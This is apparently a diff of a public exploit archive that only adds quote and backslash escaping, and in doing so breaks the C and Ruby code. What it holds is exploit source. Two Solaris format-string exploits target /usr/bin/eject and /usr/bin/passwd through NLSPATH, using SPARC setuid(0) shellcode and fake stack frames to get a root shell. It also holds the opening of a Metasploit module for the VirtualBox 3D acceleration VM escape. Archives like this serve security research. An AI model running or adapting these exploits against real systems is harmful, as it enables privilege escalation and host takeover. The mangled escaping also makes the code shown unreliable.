        strncpy(progname, argv[0], BUFF-1);
-        while ((opt = getopt(argc, argv, "n:a:o:h")) != -1)
+        while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1)
                switch((char)opt)
                {
-                        case 'n':
+                        case \'n\':
                                num = atoi(optarg);
                                break;
-                        case 'a':
+                        case \'a\':
                                align = atoi(optarg);
                                break;
-                        case 'o':
+                        case \'o\':
                                offset = atoi(optarg);
                                break;
-                        case '?':
+                        case \'?\':
-                        case 'h':
+                        case \'h\':
                        default:
                                usages(progname);
                                exit(0);
@ -125,8 +125,8 @@ main( int argc, char **argv )
        /* Construct fake frame in environ */
-        env[0] = "NLSPATH=:.";
+        env[0] = \"NLSPATH=:.\";
-        env[1] = padding;      /* padding so that fakeframe's address can be divided by 4 */
+        env[1] = padding;      /* padding so that fakeframe\'s address can be divided by 4 */
        /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
        env[2]=(fakeframe);     /* sh_addr|sh_addr|0x00                       */
        env[3]=&(fakeframe[40]);/*                     |0x00                  */
@ -136,17 +136,17 @@ main( int argc, char **argv )
        env[7]=SHELL;           /* shell strings */
        env[8]=NULL;
-        /* calculate the length of "VULPROG" + argv[1] */
+        /* calculate the length of \"VULPROG\" + argv[1] */
-        arg_len = strlen(VULPROG) + strlen("-z") + 2;
+        arg_len = strlen(VULPROG) + strlen(\"-z\") + 2;
        /* calculate the pad nummber .
-         * We manage to let the length of padding + arg_len + "NLSPATH=." can
+         * We manage to let the length of padding + arg_len + \"NLSPATH=.\" can
         * be divided by 4. So fakeframe address is aligned with 4, otherwise
-         * the exploit won't work.
+         * the exploit won\'t work.
         */
        pad = 3 - (arg_len + strlen(env[0]) +1)%4;
-        memset(padding, 'A', pad);
+        memset(padding, \'A\', pad);
-        padding[pad] = '\0';
+        padding[pad] = \'\\0\';
        /* get environ length */
        env_len = 0; 
@ -162,21 +162,21 @@ main( int argc, char **argv )
        * ^                                                         ^ 
        * |__startaddr                                              |__sp_addr 
        *
-        * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
+        * \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
        *
-        *  I find "startaddr" always can be divided by 4.
+        *  I find \"startaddr\" always can be divided by 4.
-        *  So we can adjust the padding's size to let the fakeframe address
+        *  So we can adjust the padding\'s size to let the fakeframe address
        *  can be aligned with 4.
        *
-        * len = length of "argv" + "env" + "platform" + "program name" 
+        * len = length of \"argv\" + \"env\" + \"platform\" + \"program name\" 
        * if (len%4)!=0, sp_addr - startaddr =  (len/4)*4 + 4
        * if (len%4)==0, sp_addr - startaddr =  len
-        * So we can get every entry's address precisely based on startaddr or sp_addr.
+        * So we can get every entry\'s address precisely based on startaddr or sp_addr.
-        * Now we won't be bored with guessing the alignment and offset.:)
+        * Now we won\'t be bored with guessing the alignment and offset.:)
        */
       len = arg_len + env_len + strlen(plat) + 1 
                               + strlen(VULPROG) + 1;
-       printf("len = %#x\n", len);
+       printf(\"len = %#x\\n\", len);
       /* get stack bottom address */
@ -189,7 +189,7 @@ main( int argc, char **argv )
        sh_addr =  sp_addr - (4 - len%4) /* the trailing zero number */
                           - strlen(VULPROG) - strlen(plat)  - strlen(SHELL) - 3 ;
-         printf("SHELL address = %#x\n", sh_addr);
+         printf(\"SHELL address = %#x\\n\", sh_addr);
        /* get our fake frame address */
        fp_addr = sh_addr - 8*8 - 1;
@ -197,27 +197,27 @@ main( int argc, char **argv )
        /* get execl() address */
        if (!(handle=dlopen(NULL,RTLD_LAZY)))
        {                                    
-          fprintf(stderr,"Can't dlopen myself.\n");
+          fprintf(stderr,\"Can\'t dlopen myself.\\n\");
          exit(1);
        }
-        if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
+        if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL)
        {
-          fprintf(stderr,"Can't find execl().\n");
+          fprintf(stderr,\"Can\'t find execl().\\n\");
          exit(1);
        }                                         
-        /* dec 4 to skip the 'save' instructure */
+        /* dec 4 to skip the \'save\' instructure */
        execl_addr -= 4;
        /* check if the exec addr includes zero  */
        if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
          !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
        {
-          fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
+          fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\");
          exit(1);
        }
-        printf("Using execl() address : %#x\n",execl_addr);
+        printf(\"Using execl() address : %#x\\n\",execl_addr);
        /* now we set up our fake stack frame */
@ -239,15 +239,15 @@ main( int argc, char **argv )
        *addrptr++=fp1_addr;
        *addrptr++=fp1_addr;
        *addrptr++=fp1_addr;     /* we need this address to work  */
-        *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */
+        *addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */
        *addrptr++=0x0;
        /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
        retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
-        printf("Using RETloc address = 0x%x,  fp_addr = 0x%x  ,align= %d\n", retloc, fp_addr, align );
+        printf(\"Using RETloc address = 0x%x,  fp_addr = 0x%x  ,align= %d\\n\", retloc, fp_addr, align );
-        /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
+        /* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
       addrptr = (long *)retlocbuf;
        for( i = 0 ; i < 8 ; i ++ )
@ -258,19 +258,19 @@ main( int argc, char **argv )
        *(addrptr + 7) = retloc + 2;
        if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
-           printf("Can't get enough memory!\n");
+           printf(\"Can\'t get enough memory!\\n\");
           exit(-1);
        }
-        /* Let's make formats string buffer: 
+        /* Let\'s make formats string buffer: 
         * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|  
         */
        ptr = pattern;
-        memset(ptr, 'A', 32);
+        memset(ptr, \'A\', 32);
        ptr += 32;
        for(i = 0 ; i < num ; i++ ){
-           memcpy(ptr, "%.8x", 4);
+           memcpy(ptr, \"%.8x\", 4);
           ptr += 4;
        }
@ -281,30 +281,30 @@ main( int argc, char **argv )
        /* Big endian arch */
-        sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
+        sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\",
             (reth - num*8 -4*8 + align ), (0x10000 +  retl - reth),
             (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));
-        if( !(fp = fopen("messages.po", "w+")))
+        if( !(fp = fopen(\"messages.po\", \"w+\")))
        {
-           perror("fopen");
+           perror(\"fopen\");
           exit(1);
        }
-        fprintf(fp,"domain \"messages\"\n");
+        fprintf(fp,\"domain \\\"messages\\\"\\n\");
-        fprintf(fp,"msgid  \"%%s: illegal option -- %%c\\n\"\n");
+        fprintf(fp,\"msgid  \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\");
-        fprintf(fp,"msgstr \"%s\\n\"", pattern + align);
+        fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align);
        fclose(fp);
-        system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");
+        system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\");
-        /* thanks for z33d's idea. 
+        /* thanks for z33d\'s idea. 
         * It seems we have to do like this in Solaris 8.
         */
-        i=open("./SUNW_OST_OSLIB",O_RDWR);
+        i=open(\"./SUNW_OST_OSLIB\",O_RDWR);
        /* locate the start position of formats strings in binary file*/
        lseek(i, 62, SEEK_SET);
        /* replace the start bytes with our retlocbuf */
        write(i, retlocbuf + align, 32 - align);
        close(i);
-       execle(VULPROG, VULPROG, "-z", NULL, env);
+       execle(VULPROG, VULPROG, \"-z\", NULL, env);
 }  /* end of main */
--- a/platforms/solaris/local/20188.c
+++ b/platforms/solaris/local/20188.c
@ -19,7 +19,7 @@ It should be noted under Linux this problem must be exploited in conjunction wit
 */
-/* "eject" exploit for locale subsystem format strings bug In Solaris
+/* \"eject\" exploit for locale subsystem format strings bug In Solaris
 * Tested in Solaris 2.6/7.0
 * Script kiddies: you should modify this code
 * slightly by yourself. :)
@ -37,30 +37,30 @@ It should be noted under Linux this problem must be exploited in conjunction wit
 #define RETLOC  0xffbefa2c  /* default retloc */
 #define NUM     95          /* maybe should adjust this number */
-#define ALIGN   0           /* If don't work ,try adjust align to 0,1,2,3 */
+#define ALIGN   0           /* If don\'t work ,try adjust align to 0,1,2,3 */
 #define BUFSIZE 2048        /* the size of format string buffer*/
 #define EGGSIZE 1024        /* the egg buffer size */
-#define NOP     0xfa1d4015  /* "xor %l5, %l5, %l5" */
+#define NOP     0xfa1d4015  /* \"xor %l5, %l5, %l5\" */
 #define ALIGN1  2
-#define VULPROG "/usr/bin/eject"
+#define VULPROG \"/usr/bin/eject\"
-char shellcode[] = /* from scz's funny shellcode for SPARC */
+char shellcode[] = /* from scz\'s funny shellcode for SPARC */
-"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"   /* setuid(0)  */
+\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"   /* setuid(0)  */
-"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09"   /* dup2(1,2)  */
+\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\"   /* dup2(1,2)  */
-"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08"
+\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\"
-"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
+\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\"
-"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
+\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\"
-"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
+\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\"
-"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
+\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\"
-"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
+\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\";
 /* get current stack point address to guess Return address */
 long get_sp(void)
 {
-        __asm__("mov %sp,%i0");
+        __asm__(\"mov %sp,%i0\");
 }
@ -76,14 +76,14 @@ main( int argc, char **argv )
        long reth, retl;
        FILE *fp;
-        if( argc > 1 ) sscanf(argv[1],"%x",&retloc);
+        if( argc > 1 ) sscanf(argv[1],\"%x\",&retloc);
        if( argc > 2 ) align = atoi(argv[2]);
        if( argc > 3 ) num = atoi(argv[3]);
        addrptr = (long *) retlocbuf;
        retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
-        /* Let's make reloc buffer */
+        /* Let\'s make reloc buffer */
        for( i = 0 ; i < 2 ; i ++ ){
            *addrptr++ = 0x41414141;
@ -94,7 +94,7 @@ main( int argc, char **argv )
        /* construct shellcode buffer */
-        memset(eggbuf,'A',EGGSIZE);   /* fill the eggbuf with garbage */
+        memset(eggbuf,\'A\',EGGSIZE);   /* fill the eggbuf with garbage */
        for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */
        {
           eggbuf[i+3]=NOP & 0xff;
@ -106,8 +106,8 @@ main( int argc, char **argv )
            If not, exploit will fail. Anyway, our shellcode is. ;-)
          */
         memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4  + align, shellcode, strlen(shellcode));
-         //memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
+         //memcpy(eggbuf,\"EGG=\",4);/* Now : EGG=NOP...NOPSHELLCODE */
-         env[0] = "NLSPATH=:.";
+         env[0] = \"NLSPATH=:.\";
         env[1] = eggbuf;    /* put eggbuf in env */
         env[2] = NULL;      /* end of env */
@ -117,43 +117,43 @@ main( int argc, char **argv )
        /* get stack bottom address */
        sp_addr = (get_sp() | 0xffff) & 0xfffffffc;
        /* get shellcode address . many thanks to Olaf Kirch. :)
-         * the trailing '8' make sure our sh_addr into "NOP"s area.
+         * the trailing \'8\' make sure our sh_addr into \"NOP\"s area.
         */
        sh_addr =  sp_addr - strlen(VULPROG) - strlen(plat)  - strlen(eggbuf) - 3 + 8 ;
-        printf("Usages: %s <retloc> <align> <num> <bufsize> \n\n", argv[0] );
+        printf(\"Usages: %s <retloc> <align> <num> <bufsize> \\n\\n\", argv[0] );
-        printf("Using RETloc address = 0x%x, RET address = 0x%x  ,Align= %d\n", retloc, sh_addr, align );
+        printf(\"Using RETloc address = 0x%x, RET address = 0x%x  ,Align= %d\\n\", retloc, sh_addr, align );
        if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
-           printf("Can't get enough memory!\n");
+           printf(\"Can\'t get enough memory!\\n\");
           exit(-1);
        }
        ptr = pattern;
        for(i = 0 ; i < num ; i++ ){
-           memcpy(ptr, "%.8x", 4);
+           memcpy(ptr, \"%.8x\", 4);
           ptr += 4;
        }
        reth = (sh_addr >> 16) & 0xffff ;
        retl = (sh_addr >>  0) & 0xffff ;
-        sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(reth - num*8),
+        sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\",(reth - num*8),
              (0x10000 +  retl - reth));
-        printf("%s",pattern);
+        printf(\"%s\",pattern);
-      if( !(fp = fopen("messages.po", "w+")))
+      if( !(fp = fopen(\"messages.po\", \"w+\")))
      {
-         perror("fopen");
+         perror(\"fopen\");
         exit(1);
      }
-   fprintf(fp,"domain \"messages\"\n");
+   fprintf(fp,\"domain \\\"messages\\\"\\n\");
-   fprintf(fp,"msgid  \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
+   fprintf(fp,\"msgid  \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\");
-   fprintf(fp,"msgstr \"%s\\n\"", pattern);
+   fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern);
   fclose(fp);
-   system("/usr/bin/msgfmt messages.po");
+   system(\"/usr/bin/msgfmt messages.po\");
-   system("cp messages.mo SUNW_OST_OSCMD");
+   system(\"cp messages.mo SUNW_OST_OSCMD\");
-   system("cp messages.mo SUNW_OST_OSLIB");
+   system(\"cp messages.mo SUNW_OST_OSLIB\");
-   execle(VULPROG,VULPROG,"-x",retlocbuf + align1, NULL, env);
+   execle(VULPROG,VULPROG,\"-x\",retlocbuf + align1, NULL, env);
 }  /* end of main */
--- a/platforms/solaris/local/210.c
+++ b/platforms/solaris/local/210.c
@ -3,11 +3,11 @@
 * Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. 
 * ./ex -o -4 )
 *
- * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
+ * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'`
 * usages: ./ex -h
 *
 * Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
- * Thanks for horizon's great article about defeating noexec stack for Solaris.
+ * Thanks for horizon\'s great article about defeating noexec stack for Solaris.
 *
 * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
 * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
@ -24,26 +24,26 @@
 #define BUFSIZE 2048			/* the size of format string buffer	*/
 #define BUFF    128			/* the progname buffer size		*/
-#define SHELL   "/bin/ksh"		/* shell name				*/
+#define SHELL   \"/bin/ksh\"		/* shell name				*/
 #define DEFAULT_NUM 68			/* format strings number		*/
 #define DEFAULT_RETLOC 0xffbefb44	/* default retloc address		*/
-#define VULPROG  "/usr/bin/passwd"	/* vulnerable program name		*/
+#define VULPROG  \"/usr/bin/passwd\"	/* vulnerable program name		*/
 void usages(char *progname)
 {
  int i;
-  printf("Usage: %s \n", progname);
+  printf(\"Usage: %s \\n\", progname);
-  printf("    [-h]       Help menu\n");
+  printf(\"    [-h]       Help menu\\n\");
-  printf("    [-n number]      format string's number\n");
+  printf(\"    [-n number]      format string\'s number\\n\");
-  printf("    [-a align]       retloc buffer alignment\n");
+  printf(\"    [-a align]       retloc buffer alignment\\n\");
-  printf("    [-o offset]      retloc offset\n\n");
+  printf(\"    [-o offset]      retloc offset\\n\\n\");
 }
 /* get current stack point address to guess Return address */
 long get_sp(void)
 {
-  __asm__("mov %sp,%i0");
+  __asm__(\"mov %sp,%i0\");
 }
 main( int argc, char **argv )
@ -70,22 +70,22 @@ main( int argc, char **argv )
  char progname[BUFF];
  strncpy(progname, argv[0], BUFF-1);
-  while ((opt = getopt(argc, argv, "n:a:o:h")) != -1)
+  while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1)
    switch((char)opt)
    {
-      case 'n':
+      case \'n\':
        num = atoi(optarg);
        break;
-      case 'a':
+      case \'a\':
        align = atoi(optarg);
        break;
-      case 'o':
+      case \'o\':
        offset = atoi(optarg);
        break;
-      case '?':
+      case \'?\':
-      case 'h':
+      case \'h\':
      default:
        usages(progname);
        exit(0);
@ -98,8 +98,8 @@ main( int argc, char **argv )
  /* Construct fake frame in environ */
-  env[0] = "NLSPATH=:.";
+  env[0] = \"NLSPATH=:.\";
-  env[1] = padding;      /* padding so that fakeframe's address can be divided by 4 */
+  env[1] = padding;      /* padding so that fakeframe\'s address can be divided by 4 */
  /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
  env[2]=(fakeframe);     /* sh_addr|sh_addr|0x00           */
  env[3]=&(fakeframe[40]);/*         |0x00      */
@ -109,17 +109,17 @@ main( int argc, char **argv )
  env[7]=SHELL;     /* shell strings */
  env[8]=NULL;
-  /* calculate the length of "VULPROG" + argv[1] */
+  /* calculate the length of \"VULPROG\" + argv[1] */
-  arg_len = strlen(VULPROG) + strlen("-z") + 2;
+  arg_len = strlen(VULPROG) + strlen(\"-z\") + 2;
  /* calculate the pad nummber .
-   * We manage to let the length of padding + arg_len + "NLSPATH=." can
+   * We manage to let the length of padding + arg_len + \"NLSPATH=.\" can
   * be divided by 4. So fakeframe address is aligned with 4, otherwise
-   * the exploit won't work.
+   * the exploit won\'t work.
   */
  pad = 3 - (arg_len + strlen(env[0]) +1)%4;
-  memset(padding, 'A', pad);
+  memset(padding, \'A\', pad);
-  padding[pad] = '\0';
+  padding[pad] = \'\\0\';
  /* get environ length */
  env_len = 0; 
@ -134,21 +134,21 @@ main( int argc, char **argv )
  * ^               ^ 
  * |__startaddr                |__sp_addr 
  *
-  * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
+  * \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
  *
-  *  I find "startaddr" always can be divided by 4.
+  *  I find \"startaddr\" always can be divided by 4.
-  *  So we can adjust the padding's size to let the fakeframe address
+  *  So we can adjust the padding\'s size to let the fakeframe address
  *  can be aligned with 4.
  *
-  * len = length of "argv" + "env" + "platform" + "program name" 
+  * len = length of \"argv\" + \"env\" + \"platform\" + \"program name\" 
  * if (len%4)!=0, sp_addr - startaddr =  (len/4)*4 + 4
  * if (len%4)==0, sp_addr - startaddr =  len
-  * So we can get every entry's address precisely based on startaddr or sp_addr.
+  * So we can get every entry\'s address precisely based on startaddr or sp_addr.
-  * Now we won't be bored with guessing the alignment and offset.:)
+  * Now we won\'t be bored with guessing the alignment and offset.:)
  */
  len = arg_len + env_len + strlen(plat) + 1 
  + strlen(VULPROG) + 1;
-  printf("len = %#x\n", len);
+  printf(\"len = %#x\\n\", len);
  /* get stack bottom address */
@ -161,7 +161,7 @@ main( int argc, char **argv )
  sh_addr =  sp_addr - (4 - len%4) /* the trailing zero number */
         - strlen(VULPROG) - strlen(plat)  - strlen(SHELL) - 3 ;
-   printf("SHELL address = %#x\n", sh_addr);
+   printf(\"SHELL address = %#x\\n\", sh_addr);
  /* get our fake frame address */
  fp_addr = sh_addr - 8*8 - 1;
@ -169,27 +169,27 @@ main( int argc, char **argv )
  /* get execl() address */
  if (!(handle=dlopen(NULL,RTLD_LAZY)))
  {            
-    fprintf(stderr,"Can't dlopen myself.\n");
+    fprintf(stderr,\"Can\'t dlopen myself.\\n\");
    exit(1);
  }
-  if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
+  if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL)
  {
-    fprintf(stderr,"Can't find execl().\n");
+    fprintf(stderr,\"Can\'t find execl().\\n\");
    exit(1);
  }           
-  /* dec 4 to skip the 'save' instructure */
+  /* dec 4 to skip the \'save\' instructure */
  execl_addr -= 4;
  /* check if the exec addr includes zero  */
  if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
    !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
  {
-    fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
+    fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\");
    exit(1);
  }
-  printf("Using execl() address : %#x\n",execl_addr);
+  printf(\"Using execl() address : %#x\\n\",execl_addr);
  /* now we set up our fake stack frame */
@ -211,15 +211,15 @@ main( int argc, char **argv )
  *addrptr++=fp1_addr;
  *addrptr++=fp1_addr;
  *addrptr++=fp1_addr;     /* we need this address to work  */
-  *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */
+  *addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */
  *addrptr++=0x0;
  /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
  retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
-  printf("Using RETloc address = 0x%x,  fp_addr = 0x%x  ,align= %d\n", retloc, fp_addr, align );
+  printf(\"Using RETloc address = 0x%x,  fp_addr = 0x%x  ,align= %d\\n\", retloc, fp_addr, align );
-  /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
+  /* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
  addrptr = (long *)retlocbuf;
@ -231,19 +231,19 @@ main( int argc, char **argv )
    *(addrptr + 7) = retloc + 2;
  if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
-    printf("Can't get enough memory!\n");
+    printf(\"Can\'t get enough memory!\\n\");
    exit(-1);
  }
-  /* Let's make formats string buffer: 
+  /* Let\'s make formats string buffer: 
   * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|  
   */
  ptr = pattern;
-  memset(ptr, 'A', 32);
+  memset(ptr, \'A\', 32);
  ptr += 32;
  for(i = 0 ; i < num ; i++ ){
-    memcpy(ptr, "%.8x", 4);
+    memcpy(ptr, \"%.8x\", 4);
    ptr += 4;
  }
@ -254,32 +254,32 @@ main( int argc, char **argv )
  /* Big endian arch */
-  sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
+  sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\",
         (reth - num*8 -4*8 + align ), (0x10000 +  retl - reth),
         (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));
-  if( !(fp = fopen("messages.po", "w+")))
+  if( !(fp = fopen(\"messages.po\", \"w+\")))
  {
-    perror("fopen");
+    perror(\"fopen\");
    exit(1);
  }
-  fprintf(fp,"domain \"messages\"\n");
+  fprintf(fp,\"domain \\\"messages\\\"\\n\");
-  fprintf(fp,"msgid  \"%%s: illegal option -- %%c\\n\"\n");
+  fprintf(fp,\"msgid  \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\");
-  fprintf(fp,"msgstr \"%s\\n\"", pattern + align);
+  fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align);
  fclose(fp);
-  system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");
+  system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\");
-  /* thanks for z33d's idea. 
+  /* thanks for z33d\'s idea. 
   * It seems we have to do like this in Solaris 8.
   */
-  i=open("./SUNW_OST_OSLIB",O_RDWR);
+  i=open(\"./SUNW_OST_OSLIB\",O_RDWR);
  /* locate the start position of formats strings in binary file*/
  lseek(i, 62, SEEK_SET);
  /* replace the start bytes with our retlocbuf */
  write(i, retlocbuf + align, 32 - align);
  close(i);
-  execle(VULPROG, VULPROG, "-z", NULL, env);
+  execle(VULPROG, VULPROG, \"-z\", NULL, env);
 }
--- a/platforms/win_x86-64/remote/34334.rb
+++ b/platforms/win_x86-64/remote/34334.rb
@ -3,13 +3,13 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'msf/core'
+require \'msf/core\'
-require 'rex'
+require \'rex\'
 class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking
-  DEVICE               = '\\\\.\\VBoxGuest'
+  DEVICE               = \'\\\\\\\\.\\\\VBoxGuest\'
  INVALID_HANDLE_VALUE = 0xFFFFFFFF
  # VBOX HGCM protocol constants
@ -36,59 +36,59 @@ class Metasploit3 < Msf::Exploit::Local
  def initialize(info={})
    super(update_info(info, {
-      'Name'           => 'VirtualBox 3D Acceleration Virtual Machine Escape',
+      \'Name\'           => \'VirtualBox 3D Acceleration Virtual Machine Escape\',
-      'Description'    => %q{
+      \'Description\'    => %q{
        This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
        vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
        sequence of specially crafted of rendering messages, a virtual machine can exploit an out
        of bounds array access to corrupt memory and escape to the host. This module has been
        tested successfully on Windows 7 SP1 (64 bits) as Host running  Virtual Box 4.3.6.
      },
-      'License'        => MSF_LICENSE,
+      \'License\'        => MSF_LICENSE,
-      'Author'         =>
+      \'Author\'         =>
        [
-          'Francisco Falcon', # Vulnerability Discovery and PoC
+          \'Francisco Falcon\', # Vulnerability Discovery and PoC
-          'Florian Ledoux', # Win 8 64 bits exploitation analysis
+          \'Florian Ledoux\', # Win 8 64 bits exploitation analysis
-          'juan vazquez' # MSF module
+          \'juan vazquez\' # MSF module
        ],
-      'Arch'           => ARCH_X86_64,
+      \'Arch\'           => ARCH_X86_64,
-      'Platform'       => 'win',
+      \'Platform\'       => \'win\',
-      'SessionTypes'   => ['meterpreter'],
+      \'SessionTypes\'   => [\'meterpreter\'],
-      'DefaultOptions' =>
+      \'DefaultOptions\' =>
        {
-          'EXITFUNC' => 'thread'
+          \'EXITFUNC\' => \'thread\'
        },
-      'Targets'        =>
+      \'Targets\'        =>
        [
-          [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
+          [ \'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)\',
            {
              :messages => :target_virtualbox_436_win7_64
            }
          ]
        ],
-      'Payload'        =>
+      \'Payload\'        =>
        {
-          'Space'       => 7000,
+          \'Space\'       => 7000,
-          'DisableNops' => true
+          \'DisableNops\' => true
        },
-      'References'     =>
+      \'References\'     =>
        [
-          ['CVE', '2014-0983'],
+          [\'CVE\', \'2014-0983\'],
-          ['BID', '66133'],
+          [\'BID\', \'66133\'],
-          ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
+          [\'URL\', \'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities\'],
-          ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],
+          [\'URL\', \'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration\'],
-          ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']
+          [\'URL\', \'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php\']
        ],
-      'DisclosureDate' => 'Mar 11 2014',
+      \'DisclosureDate\' => \'Mar 11 2014\',
-      'DefaultTarget'  => 0
+      \'DefaultTarget\'  => 0
    }))
  end
  def open_device
-    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
+    r = session.railgun.kernel32.CreateFileA(DEVICE, \"GENERIC_READ | GENERIC_WRITE\", 0, nil, \"OPEN_EXISTING\", \"FILE_ATTRIBUTE_NORMAL\", 0)
-    handle = r['return']
+    handle = r[\'return\']
